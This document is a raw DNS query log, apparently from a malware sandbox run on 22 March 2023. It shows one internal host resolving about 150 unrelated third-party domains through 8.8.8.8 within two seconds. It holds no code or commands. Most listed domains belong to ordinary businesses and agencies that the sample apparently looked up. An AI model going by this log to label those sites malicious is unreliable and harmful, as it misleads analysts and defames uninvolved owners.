                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.189066887 CET8.8.8.8192.168.2.50xea9bServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.199157000 CET8.8.8.8192.168.2.50xb023Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.207756042 CET8.8.8.8192.168.2.50x97e7No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.216618061 CET8.8.8.8192.168.2.50x769eNo error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.216618061 CET8.8.8.8192.168.2.50x769eNo error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.226766109 CET8.8.8.8192.168.2.50xf7e1Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.233095884 CET8.8.8.8192.168.2.50x506dNo error (0)sigtoa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.233095884 CET8.8.8.8192.168.2.50x506dNo error (0)sigtoa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.239434004 CET8.8.8.8192.168.2.50xbb82No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.249629021 CET8.8.8.8192.168.2.50x14e4No error (0)webways.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.249629021 CET8.8.8.8192.168.2.50x14e4No error (0)webways.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.253318071 CET8.8.8.8192.168.2.50x3d6Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.268156052 CET8.8.8.8192.168.2.50xead2No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.272576094 CET8.8.8.8192.168.2.50x4596No error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.275770903 CET8.8.8.8192.168.2.50x954aNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.279092073 CET8.8.8.8192.168.2.50x8897Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.284084082 CET8.8.8.8192.168.2.50xd3aaNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.297350883 CET8.8.8.8192.168.2.50x4dc7No error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.297350883 CET8.8.8.8192.168.2.50x4dc7No error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.309058905 CET8.8.8.8192.168.2.50x45eeNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.324840069 CET8.8.8.8192.168.2.50x2e76Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.337749004 CET8.8.8.8192.168.2.50xa9b8Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.340538979 CET8.8.8.8192.168.2.50x9bName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.346816063 CET8.8.8.8192.168.2.50x9c27Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.358459949 CET8.8.8.8192.168.2.50x79aaNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.359179020 CET8.8.8.8192.168.2.50xafc1Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.372883081 CET8.8.8.8192.168.2.50x9761Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.374510050 CET8.8.8.8192.168.2.50x3b81Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.379054070 CET8.8.8.8192.168.2.50x9e2Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.379146099 CET8.8.8.8192.168.2.50xc984Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.379688978 CET8.8.8.8192.168.2.50xc21fNo error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.379688978 CET8.8.8.8192.168.2.50xc21fNo error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.405256987 CET8.8.8.8192.168.2.50xb18aNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.426208019 CET8.8.8.8192.168.2.50xca71No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.431175947 CET8.8.8.8192.168.2.50xdab1Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.436012983 CET8.8.8.8192.168.2.50x8cd6No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.440562010 CET8.8.8.8192.168.2.50x33cNo error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.446944952 CET8.8.8.8192.168.2.50xfe09No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.446983099 CET8.8.8.8192.168.2.50xd95Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.447626114 CET8.8.8.8192.168.2.50xfe8cNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.454984903 CET8.8.8.8192.168.2.50xadeeNo error (0)onzcda.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.454984903 CET8.8.8.8192.168.2.50xadeeNo error (0)onzcda.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.460182905 CET8.8.8.8192.168.2.50x7120No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.472518921 CET8.8.8.8192.168.2.50xa390No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.473640919 CET8.8.8.8192.168.2.50x7420No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.507646084 CET8.8.8.8192.168.2.50x77b2No error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.517230988 CET8.8.8.8192.168.2.50x83bfServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.531833887 CET8.8.8.8192.168.2.50x23c5Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.532365084 CET8.8.8.8192.168.2.50x66a5No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.532852888 CET8.8.8.8192.168.2.50xed30No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.549108982 CET8.8.8.8192.168.2.50xacd9No error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.558392048 CET8.8.8.8192.168.2.50x40f4No error (0)workplus.hu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.558392048 CET8.8.8.8192.168.2.50x40f4No error (0)workplus.hu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.558991909 CET8.8.8.8192.168.2.50x3427Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.567389011 CET8.8.8.8192.168.2.50x7688Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.569385052 CET8.8.8.8192.168.2.50xfc31No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.579139948 CET8.8.8.8192.168.2.50xe31cNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.582781076 CET8.8.8.8192.168.2.50x3061Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.592256069 CET8.8.8.8192.168.2.50x3b67Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.608787060 CET8.8.8.8192.168.2.50x5a52Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.623316050 CET8.8.8.8192.168.2.50xd553Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.637429953 CET8.8.8.8192.168.2.50xdb52No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.637638092 CET8.8.8.8192.168.2.50xfb75No error (0)sinwal.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.637638092 CET8.8.8.8192.168.2.50xfb75No error (0)sinwal.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.641661882 CET8.8.8.8192.168.2.50xdd14Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.650186062 CET8.8.8.8192.168.2.50xe393Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.654221058 CET8.8.8.8192.168.2.50x3ee6No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.675859928 CET8.8.8.8192.168.2.50xa509Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.680180073 CET8.8.8.8192.168.2.50xa385No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.682463884 CET8.8.8.8192.168.2.50xb9edNo error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.686935902 CET8.8.8.8192.168.2.50x4ce9No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.694924116 CET8.8.8.8192.168.2.50xb2a4No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.736702919 CET8.8.8.8192.168.2.50x456eNo error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.742065907 CET8.8.8.8192.168.2.50x4242Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.750557899 CET8.8.8.8192.168.2.50xad67No error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.756951094 CET8.8.8.8192.168.2.50xa059No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.756951094 CET8.8.8.8192.168.2.50xa059No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.756951094 CET8.8.8.8192.168.2.50xa059No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.756951094 CET8.8.8.8192.168.2.50xa059No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.786406040 CET8.8.8.8192.168.2.50x6f8dNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.793303013 CET8.8.8.8192.168.2.50xbb62Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.799180031 CET8.8.8.8192.168.2.50x442eNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.799180031 CET8.8.8.8192.168.2.50x442eNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.820983887 CET8.8.8.8192.168.2.50xffefName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.845941067 CET8.8.8.8192.168.2.50x62d3Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.861170053 CET8.8.8.8192.168.2.50x21b8No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.865901947 CET8.8.8.8192.168.2.50xb386Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.885730982 CET8.8.8.8192.168.2.50xa0aNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.885730982 CET8.8.8.8192.168.2.50xa0aNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.888003111 CET8.8.8.8192.168.2.50x9cfNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.888003111 CET8.8.8.8192.168.2.50x9cfNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.954202890 CET8.8.8.8192.168.2.50xd57fNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.954202890 CET8.8.8.8192.168.2.50xd57fNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.965815067 CET8.8.8.8192.168.2.50xd684Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.971729040 CET8.8.8.8192.168.2.50xd39aServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.972058058 CET8.8.8.8192.168.2.50xc6eaNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.972058058 CET8.8.8.8192.168.2.50xc6eaNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.976535082 CET8.8.8.8192.168.2.50x1464No error (0)dspears.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.976535082 CET8.8.8.8192.168.2.50x1464No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.976535082 CET8.8.8.8192.168.2.50x1464No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.976535082 CET8.8.8.8192.168.2.50x1464No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:35.983555079 CET8.8.8.8192.168.2.50x6299No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.003365040 CET8.8.8.8192.168.2.50x139dNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.007204056 CET8.8.8.8192.168.2.50xd658No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.009532928 CET8.8.8.8192.168.2.50x60baName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.051147938 CET8.8.8.8192.168.2.50x9c67No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.056761980 CET8.8.8.8192.168.2.50xd20dNo error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.059920073 CET8.8.8.8192.168.2.50xdb21Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.065829039 CET8.8.8.8192.168.2.50x5916No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.066648006 CET8.8.8.8192.168.2.50xaac1No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.066678047 CET8.8.8.8192.168.2.50x11dcNo error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.079674006 CET8.8.8.8192.168.2.50x2dc9No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.079674006 CET8.8.8.8192.168.2.50x2dc9No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.085431099 CET8.8.8.8192.168.2.50x6ac4No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.096978903 CET8.8.8.8192.168.2.50xa783No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.100451946 CET8.8.8.8192.168.2.50x8e98No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.109437943 CET8.8.8.8192.168.2.50xda98No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.139687061 CET8.8.8.8192.168.2.50x8e9cName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.155123949 CET8.8.8.8192.168.2.50x749No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.158301115 CET8.8.8.8192.168.2.50xdd21No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.164758921 CET8.8.8.8192.168.2.50x9fa7No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.212018013 CET8.8.8.8192.168.2.50xd2b2No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.233530045 CET8.8.8.8192.168.2.50x4479No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.234827995 CET8.8.8.8192.168.2.50xb4aaNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.252379894 CET8.8.8.8192.168.2.50xd361Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.297713041 CET8.8.8.8192.168.2.50x6860Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.311027050 CET8.8.8.8192.168.2.50xdd91No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.329556942 CET8.8.8.8192.168.2.50xe3a7No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.331501007 CET8.8.8.8192.168.2.50x5d4dNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.343579054 CET8.8.8.8192.168.2.50xbfa4No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.354836941 CET8.8.8.8192.168.2.50x21efNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.363183975 CET8.8.8.8192.168.2.50xb487No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.368309975 CET8.8.8.8192.168.2.50x9761Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.371529102 CET8.8.8.8192.168.2.50x5bb9No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.384255886 CET8.8.8.8192.168.2.50xd1bbNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.463006020 CET8.8.8.8192.168.2.50x376dNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.463006020 CET8.8.8.8192.168.2.50x376dNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.496305943 CET8.8.8.8192.168.2.50x4db3No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.496305943 CET8.8.8.8192.168.2.50x4db3No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.496305943 CET8.8.8.8192.168.2.50x4db3No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.508975029 CET8.8.8.8192.168.2.50xae3fNo error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.532031059 CET8.8.8.8192.168.2.50x4760No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.561485052 CET8.8.8.8192.168.2.50xccafNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.561485052 CET8.8.8.8192.168.2.50xccafNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.561661959 CET8.8.8.8192.168.2.50x5422No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.564059019 CET8.8.8.8192.168.2.50xcb1fName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.631283045 CET8.8.8.8192.168.2.50x1b65No error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.662611008 CET8.8.8.8192.168.2.50xa0c8No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.680901051 CET8.8.8.8192.168.2.50xa7aeNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.696182013 CET8.8.8.8192.168.2.50x35f8No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.716641903 CET8.8.8.8192.168.2.50xa842No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.729895115 CET8.8.8.8192.168.2.50x929aNo error (0)eos-i.commacx1980.qy56.supcname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.729895115 CET8.8.8.8192.168.2.50x929aNo error (0)macx1980.qy56.supcname.commfddos.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.729895115 CET8.8.8.8192.168.2.50x929aNo error (0)mfddos.datacname.com15.204.18.132.datacname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.729895115 CET8.8.8.8192.168.2.50x929aNo error (0)15.204.18.132.datacname.com15.204.18.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.730051041 CET8.8.8.8192.168.2.50x41f7No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.742399931 CET8.8.8.8192.168.2.50x2245No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.761162043 CET8.8.8.8192.168.2.50xd53cNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:36.763674974 CET8.8.8.8192.168.2.50xb478No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
